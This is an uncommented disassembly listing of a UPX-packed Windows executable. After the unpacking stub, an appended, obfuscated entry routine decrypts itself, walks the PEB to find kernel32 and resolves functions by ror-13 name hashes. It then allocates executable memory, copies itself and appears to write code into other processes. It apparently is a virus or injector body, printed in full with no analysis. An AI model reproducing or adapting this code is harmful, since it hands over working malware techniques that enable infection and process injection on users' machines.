dd 65316CD3h, 70737714h, 746E6972h, 3FFB1366h, 0F001FFC8h
dd 1F06014Ch, 0F0D0906h, 171A302Dh, 1415112Ah, 0FFFFFF02h
dd 2D1715BFh, 1E111A11h, 814182Ah, 9110B07h, 0C0B0F09h
dd 18111D1Bh, 6F100B09h, 0F70C060Ah, 1CB7B7EEh, 0B400C2Dh
dd 48110F13h, 470B1A37h, 6291043h, 7FFF6FBBh, 100E300Ah
dd 0E271610h, 5280D0Eh, 3A32173Dh, 24100516h, 0ED347E17h
dd 6FFFF2Fh, 2B0C2716h, 140E1111h, 5100707h, 100D0513h
dd 240D1222h, 0BFEE1B0Ch, 1F44BAEDh, 1241035Ah, 2C0E284Ch
dd 84101B16h, 0F6ED0E2Ch, 0BA3EEFFh, 0E1B1C18h, 25314111h
dd 62D0C28h, 0A9A053Fh, 0DBEF000Fh, 1011FDB6h, 1A0D0B0Eh
dd 1444086Ch, 120B0C08h, 0DDBE0017h, 0C15FFFEh, 0E0A0E08h
dd 1518053Eh, 2708103Dh, 0F103F3Eh, 27402711h, 735B6B41h
dd 93F01C7h, 25117013h, 7FFF5B02h, 160CFB77h, 18368C0Eh
dd 27293109h, 0E241939h, 7014093Bh, 570E0B19h, 0FEEFBF6Bh
dd 4A0D082Dh, 0C8082810h, 13060709h, 0C552A06h, 6FDCEDF4h
dd 4D37FFFFh, 0E0F3C11h, 0F13331Bh, 17102012h, 4236119Ah
dd 0B7280D19h, 42DEEDD6h, 31145B10h, 0B043722h, 2A1118E6h
dd 0B7B6DDBFh, 506C40Eh, 0A00F9312h, 12525938h, 0B850914h
dd 0EDFDF6B7h, 0A20D4C15h, 48342A09h, 1E786605h, 4B13A81Ch
dd 0DAD0BC5Bh, 4C13070Eh, 45500034h, 0FED94C7Dh, 401FE43h
dd 0BAD0D00h, 200E047h, 8010B01h, 3400280Ch, 130EACF7h
dd 2E04326Bh, 3337CB60h, 20B04BDh, 96CE3304h, 0C07B374h
dd 65101E70h, 2BCD92F1h, 0EAF60607h, 6CE5920Eh, 86603C42h
dd 1759003h, 1CA21712h, 36C17D1Eh, 65742E3Fh, 26CB7478h
dd 0DB04EB90h, 7D85CDC6h, 64722E20h, 1A8361C9h, 3BDF653Bh
dd 6A2C23FBh, 9B262E40h, 7336BEC2h, 0C092501Fh, 0B3C8324Fh
dd 6F6C657Ch, 30608E63h, 537ED9EEh, 42C41B42h, 59D44A23h
dd 0
dd 48000h, 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_407000
lea edi, [esi-6000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_4086D2
; ---------------------------------------------------------------------------
align 8
loc_4086C8: ; CODE XREF: UPX1:loc_4086D9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_4086CE: ; CODE XREF: UPX1:00408766�j
; UPX1:0040877D�j
add ebx, ebx
jnz short loc_4086D9
loc_4086D2: ; CODE XREF: UPX1:004086C0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4086D9: ; CODE XREF: UPX1:004086D0�j
jb short loc_4086C8
mov eax, 1
loc_4086E0: ; CODE XREF: UPX1:004086EF�j
; UPX1:004086FA�j
add ebx, ebx
jnz short loc_4086EB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4086EB: ; CODE XREF: UPX1:004086E2�j
adc eax, eax
add ebx, ebx
jnb short loc_4086E0
jnz short loc_4086FC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_4086E0
loc_4086FC: ; CODE XREF: UPX1:004086F1�j
xor ecx, ecx
sub eax, 3
jb short loc_408710
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_408782
mov ebp, eax
loc_408710: ; CODE XREF: UPX1:00408701�j
add ebx, ebx
jnz short loc_40871B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40871B: ; CODE XREF: UPX1:00408712�j
adc ecx, ecx
add ebx, ebx
jnz short loc_408728
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_408728: ; CODE XREF: UPX1:0040871F�j
adc ecx, ecx
jnz short loc_40874C
inc ecx
loc_40872D: ; CODE XREF: UPX1:0040873C�j
; UPX1:00408747�j
add ebx, ebx
jnz short loc_408738
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_408738: ; CODE XREF: UPX1:0040872F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_40872D
jnz short loc_408749
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_40872D
loc_408749: ; CODE XREF: UPX1:0040873E�j
add ecx, 2
loc_40874C: ; CODE XREF: UPX1:0040872A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_40876C
loc_40875D: ; CODE XREF: UPX1:00408764�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_40875D
jmp loc_4086CE
; ---------------------------------------------------------------------------
align 4
loc_40876C: ; CODE XREF: UPX1:0040875B�j
; UPX1:00408779�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_40876C
add edi, ecx
jmp loc_4086CE
; ---------------------------------------------------------------------------
loc_408782: ; CODE XREF: UPX1:0040870C�j
pop esi
mov edi, esi
mov ecx, 0A9h
loc_40878A: ; CODE XREF: UPX1:00408791�j
; UPX1:00408796�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40878F: ; CODE XREF: UPX1:004087B4�j
cmp al, 1
ja short loc_40878A
cmp byte ptr [edi], 1
jnz short loc_40878A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_40878F
lea edi, [esi+6000h]
loc_4087BC: ; CODE XREF: UPX1:004087DE�j
mov eax, [edi]
or eax, eax
jz short loc_4087FE
mov ebx, [edi+4]
lea eax, [eax+esi+8000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+803Ch]
xchg eax, ebp
loc_4087D9: ; CODE XREF: UPX1:004087F6�j
mov al, [edi]
inc edi
or al, al
jz short loc_4087BC
mov ecx, edi
push edi
dec eax
repne scasb
push ebp
call dword ptr [esi+8040h]
or eax, eax
jz short loc_4087F8
mov [ebx], eax
add ebx, 4
jmp short loc_4087D9
; ---------------------------------------------------------------------------
loc_4087F8: ; CODE XREF: UPX1:004087EF�j
call dword ptr [esi+8048h]
loc_4087FE: ; CODE XREF: UPX1:004087C0�j
add edi, 4
lea ebx, [esi-4]
loc_408804: ; CODE XREF: UPX1:00408820�j
xor eax, eax
mov al, [edi]
inc edi
or eax, eax
jz short loc_40882F
cmp al, 0EFh
ja short loc_408822
loc_408811: ; CODE XREF: UPX1:0040882D�j
add ebx, eax
mov eax, [ebx]
xchg al, ah
rol eax, 10h
xchg al, ah
add eax, esi
mov [ebx], eax
jmp short loc_408804
; ---------------------------------------------------------------------------
loc_408822: ; CODE XREF: UPX1:0040880F�j
and al, 0Fh
shl eax, 10h
mov ax, [edi]
add edi, 2
jmp short loc_408811
; ---------------------------------------------------------------------------
loc_40882F: ; CODE XREF: UPX1:0040880B�j
mov ebp, [esi+8044h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+1EFh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp-80h]
loc_408863: ; CODE XREF: UPX1:00408867�j
push 0
cmp esp, eax
jnz short loc_408863
sub esp, 0FFFFFF80h
jmp loc_40326B
; ---------------------------------------------------------------------------
align 800h
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 409000h
dd 3 dup(0)
dd 9058h, 903Ch, 3 dup(0)
dd 9065h, 9050h, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E6169Ah, 77E75CB5h, 0
aJW db 'jÉÔw',0
align 4
aKernel32_dll db 'KERNEL32.DLL',0
aUser32_dll db 'USER32.dll',0
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 50746547h, 41636F72h
dd 65726464h, 7373h, 74726956h, 506C6175h, 65746F72h, 7463h
dd 74697845h, 636F7250h, 737365h, 73770000h, 6E697270h
dd 416674h, 8000h, 0Ch, 36B2h, 4Fh dup(0)
dd 9000h, 0Ch, 322Ah
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_8 = dword ptr -8
add al, 0D4h
shl dh, 0A6h
neg cl
shr cx, cl
mov ebx, 7D2A2E87h
jbe short $+2
add ebx, 82D5D69Ah
rol edx, cl
sar edx, 0C7h
push 6501BE52h
push edx
inc edx
jmp short loc_409233
; ---------------------------------------------------------------------------
db 22h
; ---------------------------------------------------------------------------
loc_409233: ; CODE XREF: start+24�j
sbb edx, esi
pop edx
jnz short $+2
pop ecx
push ecx
and ecx, 97065A8h
btr ecx, ebx
push ebp
add ebp, 0EBDA7007h
adc ebp, edx
pop ebp
pop ecx
jnp short $+2
add ecx, 9B3ED475h
loc_409256: ; CODE XREF: start+B5�j
rol dh, 8Fh
not al
mov ah, [ecx]
dec ah
sub al, 5
rol edx, 0B6h
sar edi, 13h
mov dl, 8Dh
add ah, 6Bh
mov esi, 35887FD8h
jmp short loc_409275
; ---------------------------------------------------------------------------
db 0EBh
; ---------------------------------------------------------------------------
loc_409275: ; CODE XREF: start+66�j
ror al, 8Eh
xor ah, 69h
shl di, cl
or dl, bh
add dx, 1Dh
add ah, bl
jmp short loc_409289
; ---------------------------------------------------------------------------
db 6Bh
; ---------------------------------------------------------------------------
loc_409289: ; CODE XREF: start+7A�j
ror dx, 56h
xor edx, 0FD034644h
xor ah, 0C1h
rol dx, cl
add al, cl
mov [ecx], ah
xor dx, bx
sub dl, ah
inc ecx
rcl si, cl
xor dl, 0FBh
ror dl, 7Eh
add dl, dh
dec ebx
rcl al, 4Fh
not al
rcl dl, cl
rcr dl, 0DEh
rcl al, cl
rcl dl, 97h
rol edx, 7
jnz loc_409256
xor eax, eax
lea ecx, [eax+0Bh]
loc_4092CC: ; CODE XREF: start+C1�j
push eax
loop loc_4092CC
mov ebp, esp
mov eax, fs:[eax+30h]
js short loc_4092E3
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov eax, [eax+8]
jmp short loc_4092EC
; ---------------------------------------------------------------------------
loc_4092E3: ; CODE XREF: start+C9�j
mov eax, [eax+34h]
add eax, 7Ch
mov eax, [eax+3Ch]
loc_4092EC: ; CODE XREF: start+D5�j
mov [ebp+4], eax
call sub_40936F
pusha
mov ebx, [ebp+4]
xor bx, bx
mov esi, [ebx+3Ch]
mov esi, [ebx+esi+78h]
add esi, ebx
push esi
mov ecx, [esi+18h]
mov esi, [esi+20h]
add esi, ebx
xchg eax, edx
inc ecx
loc_40930F: ; CODE XREF: start+127�j
dec ecx
jz short loc_409317
lodsd
or eax, eax
jnz short loc_40931C
loc_409317: ; CODE XREF: start+104�j start+14C�j ...
pop eax
popa
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40931C: ; CODE XREF: start+109�j
add eax, ebx
push edx
xor edi, edi
loc_409321: ; CODE XREF: start+122�j
movzx edx, byte ptr [eax]
cmp dl, dh
jz short loc_409330
ror edi, 0Dh
add edi, edx
inc eax
jmp short loc_409321
; ---------------------------------------------------------------------------
loc_409330: ; CODE XREF: start+11A�j
pop edx
cmp edi, edx
jnz short loc_40930F
pop esi
sub ecx, [esi+18h]
neg ecx
mov eax, [esi+24h]
add eax, ebx
mov cx, [eax+ecx*2]
mov edx, [esi+1Ch]
add edx, ebx
mov eax, [edx+ecx*4]
add eax, ebx
mov [esp+24h+var_8], eax
mov al, [eax]
sub al, 34h
cmp al, 98h
jz short loc_409317
cmp al, 0C6h
jz short loc_409317
cmp al, 0C7h
jz short loc_409317
popa
test dword ptr [ebp+4], 1
jnz short locret_40936E
jmp eax
; ---------------------------------------------------------------------------
locret_40936E: ; CODE XREF: start+15E�j
retn
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40936F proc near ; CODE XREF: start+E3�p
; FUNCTION CHUNK AT 00409415 SIZE 0000007B BYTES
; FUNCTION CHUNK AT 004094F2 SIZE 00000014 BYTES
pop esi
mov [ebp+14h], esi
loc_409373: ; CODE XREF: sub_40936F+D�j
dec esi
xor si, si
cmp word ptr [esi], 5A4Dh
jnz short loc_409373
mov [ebp+0], esi
mov esi, 400000h
sub esi, [ebp+0]
mov [ebp+20h], esi
mov dword ptr [ebp+24h], 451A2A55h
mov dword ptr [ebp+28h], 797CF54Dh
xor eax, eax
mov eax, fs:[eax+30h]
mov eax, [eax+0Ch]
mov eax, [eax+1Ch]
push dword ptr [eax+8]
pop dword ptr [ebp+8]
xor eax, eax
mov eax, fs:[eax+20h]
push eax
push 0
push 400h
mov eax, 0EFE297C0h
call dword ptr [ebp+14h]
push 0
push 4
lea ecx, [ebp+0Ch]
push ecx
push 7
push eax
mov ebx, [ebp+8]
xchg ebx, [ebp+4]
mov eax, 0B10FD839h
call dword ptr [ebp+14h]
xchg ebx, [ebp+4]
mov eax, [ebp+0Ch]
add [ebp+24h], eax
xor [ebp+28h], eax
push 40h
push 1000h
push 1000h
push 0
mov eax, 91AFCA54h
mov esi, [ebp+14h]
call esi
mov edi, eax
jmp short loc_409415
sub_40936F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_409403 proc near ; CODE XREF: sub_40936F:loc_409415�p
mov ecx, 521h
rep movsb
pop edx
sub edx, [ebp+14h]
mov [ebp+14h], eax
add edx, eax
jmp edx
sub_409403 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40936F
loc_409415: ; CODE XREF: sub_40936F+92�j
call sub_409403
xor eax, eax
mov edi, fs:[eax+20h]
mov ebx, [ebp+8]
push edi
push 0
push 400h
mov eax, 0EFE297C0h
call dword ptr [ebp+14h]
mov esi, eax
push 18h
push 40h
mov eax, 0C0397ECh
call dword ptr [ebp+14h]
mov [ebp+10h], eax
loc_409444: ; CODE XREF: sub_40936F+100�j
push 0
push esp
push 18h
push dword ptr [ebp+10h]
push 0
push esi
xchg ebx, [ebp+4]
mov eax, 0B10FD839h
call dword ptr [ebp+14h]
xchg ebx, [ebp+4]
pop eax
push esi
mov eax, 0FFD97FBh
call dword ptr [ebp+14h]
mov ebx, [ebp+10h]
mov eax, [ebx+14h]
test eax, eax
jz short loc_409444
mov esi, eax
push ebx
mov eax, 7CB922F6h
call dword ptr [ebp+14h]
push esi
push 0
push 410h
mov eax, 0EFE297C0h
call dword ptr [ebp+14h]
mov ebx, eax
jmp short loc_4094F2
; END OF FUNCTION CHUNK FOR sub_40936F
; =============== S U B R O U T I N E =======================================
sub_409490 proc near ; CODE XREF: sub_40936F:loc_4094F2�p
pop esi
mov ecx, 0Ch
loc_409496: ; CODE XREF: sub_409490+55�j
lodsd
cmp ecx, 4
ja short loc_4094A5
mov eax, [ebp+8]
xchg eax, [ebp+4]
mov [ebp+8], eax
loc_4094A5: ; CODE XREF: sub_409490+A�j
push ecx
inc dword ptr [ebp+4]
call dword ptr [ebp+14h]
dec dword ptr [ebp+4]
or eax, eax
jz short loc_4094E3
mov edi, eax
cmp ecx, 4
ja short loc_4094C3
mov eax, [ebp+8]
xchg eax, [ebp+4]
mov [ebp+8], eax
loc_4094C3: ; CODE XREF: sub_409490+28�j
push 0
push esp
push 40h
push 7Fh
push edi
mov eax, 7946C61Bh
call dword ptr [ebp+14h]
pop eax
push 0
push 7Fh
push edi
push edi
push ebx
mov eax, 579D1BE9h
call dword ptr [ebp+14h]
loc_4094E3: ; CODE XREF: sub_409490+21�j
pop ecx
dec ecx
jnz short loc_409496
push ebx
mov eax, 0FFD97FBh
call dword ptr [ebp+14h]
jmp esi
sub_409490 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40936F
loc_4094F2: ; CODE XREF: sub_40936F+11F�j
call sub_409490
cmp dword ptr [ecx+654A78B5h], 76h
inc edi
or bh, [edx+edx*2]
sub ch, [edx+67h]
hlt
; END OF FUNCTION CHUNK FOR sub_40936F
; ---------------------------------------------------------------------------
dw 8056h
dd 2343AF7Dh, 6BF791FBh, 56CA2BD0h, 1B53D987h, 397946C6h
dd 9DB16FE4h, 8913DC90h, 33BC3F4Dh, 408B64C0h, 6A5020h
dd 40068h, 97C0B800h, 55FFEFE2h, 6A006A14h, 0C4D8D04h
dd 50076A51h, 87085D8Bh, 39B8045Dh, 0FFB10FD8h, 5D871455h
dd 0C458B04h, 31244501h, 0C0332845h, 20408B64h, 68006A50h
dd 400h, 0E297C0B8h, 1455FFEFh, 46A006Ah, 510C4D8Dh, 8B50076Ah
dd 5D87085Dh, 0D839B804h, 55FFB10Fh, 45D8714h, 10C458Bh
dd 45312445h, 6A545028h, 458B40h, 0FF3C4003h, 75FF5070h
dd 0C61BB800h, 55FF7946h, 1CEB5814h, 81CE8B5Eh, 20BC6h
dd 72F13B00h, 33068717h, 45032445h, 83068728h, 0EDEB04EEh
dd 0FFFFDFE8h, 9F4BAFFFh, 0C39918CEh, 769BBFE6h, 2A19E1B0h
dd 0CC5E2311h, 4359A121h, 29FE1E4h, 2AFF9E4h, 259F1FCh
dd 745E17DBh, 261233A9h, 0F9920E7h, 1817A17h, 0C3D9B0E6h
dd 7AB9558Bh, 0C3992120h, 0FC814AE7h, 82144526h, 822333B6h
dd 0EFC2BFE0h, 0FC8EE721h, 0EFC2BED6h, 1B175E1h, 0C3D950E6h
dd 7AB9558Bh, 0C3990971h, 54814AE7h, 0C14015Dh, 2A5ECF8Bh
dd 5221E296h, 3DB420A6h, 90144ACBh, 0CA76A7E2h, 8014DED1h
dd 4C99ADE3h, 54F3392Ch, 0D674E184h, 0BE9F2C63h, 0E0145A97h
dd 0D398C461h, 0EAF320E6h, 0E9746FE2h, 0BE9C2C63h, 0E0145A97h
dd 0D398C461h, 0EAF320E6h, 0DD746F92h, 0BE9D2C63h, 0E0145AEAh
dd 0D398C461h, 0DFB620E6h, 0CC53A7BBh, 4F2455A9h, 69E220A4h
dd 54FDE0B3h, 798810A6h, 991426A6h, 0DD5FE182h, 9916F0B3h
dd 0EBC22182h, 0C3F16148h, 0AB992096h, 0C39FC0E6h, 9E212148h
dd 0C30E9028h, 8916355Dh, 5399E296h, 0BEB420A6h, 0D7CBBF86h
dd 4F88FE6Dh, 0C399211Ch, 92997DE3h, 900BE951h, 9998DC94h
dd 4A714E92h, 4A9920E6h, 40143CADh, 0C3D2BF96h, 1512336Bh
dd 1314257Dh, 0D603ECBh, 0C36920E6h, 2F486597h, 0CB85B24Dh
dd 0D71528E3h, 97177EC3h, 4266A0E3h, 78883A7Dh, 43BEDFEBh
dd 520921F9h, 0FF7C3C6Bh, 82997DE3h, 548EDFA1h, 48DF3D5Dh
dd 0CF14255Dh, 4A8D4AE7h, 0D674255Dh, 0D7E32051h, 0D1659F3Eh
dd 0DFC3207Ah, 0C39904CEh, 2129FE6h, 0F1C0972h, 4F20DFE2h
dd 7A26352Ch, 0F4996116h, 32A40155h, 0C0F8A697h, 0CC7720E7h
dd 0C9920E6h, 0C399D923h, 42FB20E6h, 0C399092Ch, 59BBFE6h
dd 0C3992097h, 0EFD21435h, 74B165E3h, 517E2BC0h, 7424949Eh
dd 0F2B8AB13h, 7C3D1656h, 32FF12FAh, 7D93599Eh, 819112FAh
dd 71D8ED3Ah, 16FC7E13h, 407962DEh, 2E805620h, 0A5B0E3E1h
dd 8984A216h, 0BB58FF3Eh, 0D2E53F16h, 3 dup(0)
dd 9818h, 9810h, 5 dup(0)
dd 77D8E3F4h, 0
aUser32_dll_0 db 'user32.dll',0
align 4
dd 5F7h dup(0)
UPX2 ends
; Section 4. (virtual address 0000B000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000B000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 40B000h
align 2000h
_idata2 ends
end start